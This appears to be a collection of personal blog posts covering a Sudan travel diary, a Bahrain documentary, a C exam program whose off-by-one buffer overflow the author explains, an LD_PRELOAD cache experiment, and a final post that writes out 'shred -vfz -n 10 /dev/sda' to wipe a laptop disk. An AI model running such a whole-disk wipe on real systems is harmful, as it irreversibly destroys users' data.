if [ $(xrandr -q | grep -c " 1920x1080 60.0 +") -eq 2 ]; then
xrandr --output LVDS1 --off
xrandr --output HDMI3 --auto --rotate left --output VGA1 --auto --right-of HDMI3 --primary
else
xrandr --output VGA1 --off --output HDMI3 --off
xrandr --output LVDS1 --auto
fi
I'm back from Sudan! – After six weeks of travelling in the desert, mostly taking cheap sleeping options and uncomfortable local transport it is a huge relief to have these certain luxury items again: Water from the tap (which you can drink!), a hot shower, a washing machine and a nice bed.
I wrote a travel diary and will use excerpts to write up a travelog with some photos from the journey. (This will take some days, naturally.) Already I tried stitching together a panorama image of Marawi, taken in the first morning light from the top of Jebel Barkal near Karima. It's a very typical pattern which you can see anywhere along the Nile: a few hundred meters of fields, then the main village, a tarmac road – built by the Chinese, mostly – and then: hundreds of kilometers of desert.
It is shivery-cold here in Berlin; already I miss Khartoum's every-day-above-40°C weather.
I'm so excited! Tomorrow afternoon, together with a good friend of mine I'll board a plane to Cairo, Egypt. There, we'll try to acquire visas to enter Sudan. Essentially, we will travel up the river Nile from Cairo via Aswan, Wadi Halfa, and Atbara to Khartoum. If we have time, we'll also visit Port Sudan. In total, we have six weeks of time on our hands.
I hope I'm prepared well: I've been learning a bit of Arabic at university for the past two semesters; also, I've been reading the Sudan Tribune the past few months to stay up to date about the situation there. – Other than that, it's the usual stuff you should bring: insect repellent, anti-malaria tablets, water purifier, sunscreen, a good book and a (paper) notebook. Oh, and they don't have ATMs in Sudan, so it's all cash. Better hide it well. (Correction: There are no ATMs for international credit cards like MasterCard, Visa or AmEx. For the local banks, there are quite a few.)
I had to cut down on my initial travel plans, which would have led from Cairo to Dar es Salaam (via Khartoum, Juba, Kampala), crossing five countries in total. This is not feasible any more, however, due to the high tension and violence in Southern Sudan (especially in the Abyei region). – On the upside, it'll be a rather relaxed journey now!
In Khartoum it's 36°C right now... – See you in April!
Al Jazeera's documentary about the Bahrain protests, Shouting in the Dark, has received a prestigious award. The documentary is really worth watching.
I found the insidious practices of the Bahraini prince – and the Arab League's support – extremely unnerving.
I just wrote an exam for the course Technische Informatik III which was about operating systems and network communication. In the exercises throughout the semester, we had to program in C a lot. Naturally, the exam included one task about interpreting what a C program does.
It was really simple: Listen on a UDP socket and print incoming packets
along with source address and port. The program looked somewhat like this (from
what I remember; also some things were done in a not so clever way on the exercise
sheet, and they had obfuscated the variable names to a non-descriptive
a, b, etc.):
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <error.h>
int main(int argc, char *argv[])
{
int sockfd;
struct sockaddr_in listen, incoming;
socklen_t incoming_len;
char buf[1024];
int len; /* of received data */
/* listen on 0.0.0.0:5000 */
listen.sin_family = AF_INET;
listen.sin_addr.s_addr = INADDR_ANY;
listen.sin_port = htons(5000);
if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
perror("socket");
if(bind(sockfd, (struct sockaddr *) &listen, sizeof(listen)) == -1)
perror("bind");
while(1) {
len = recvfrom(sockfd, buf, 1024, 0, (struct sockaddr *) &incoming,
&incoming_len);
buf[len] = '\0';
printf("from %s:%d: \"%s\"\n", inet_ntoa(incoming.sin_addr),
ntohs(incoming.sin_port), buf);
}
}
I lol'd so hard when I saw this. It's a classic off-by-one error. (Can you spot it, too?)
If you want to store x bytes of data in a string, reserve x+1
bytes for the NUL termination character. Here, if you send a message
that is exactly 1024 bytes long (or longer, as it'll get truncated),
buf[len] will actually be the 1025th byte, one past the end of buf. Which might
just be anything.
And those guys want to teach network and filesystem programming – hilarious. :-D
Last weekend I toyed around a bit and tried to write a shared object
library that can be used via LD_PRELOAD to minimize the effect a
program has on the Linux filesystem
cache.
Basically the use case is that you have a production system running, and you don't want your backup script to fill the filesystem cache with mostly useless information at night (files that were cached should stay cached). I haven't tested yet whether this brings measurable improvements.
The coding was really fun and provided me with yet another insight into how the simple concept of file descriptors in UNIX is just great. (GNU software is tough, though: I got stuck once, and found help on Stackoverflow, which I had never used before.)
I'm currently shredding my old X41's hard drive, because I want to sell it (if you are interested, contact me). I'm overwriting it with zeros, ten passes:
$ shred -vfz -n 10 /dev/sda
Luckily, the disk was fully encrypted all the time. So it's just a precaution.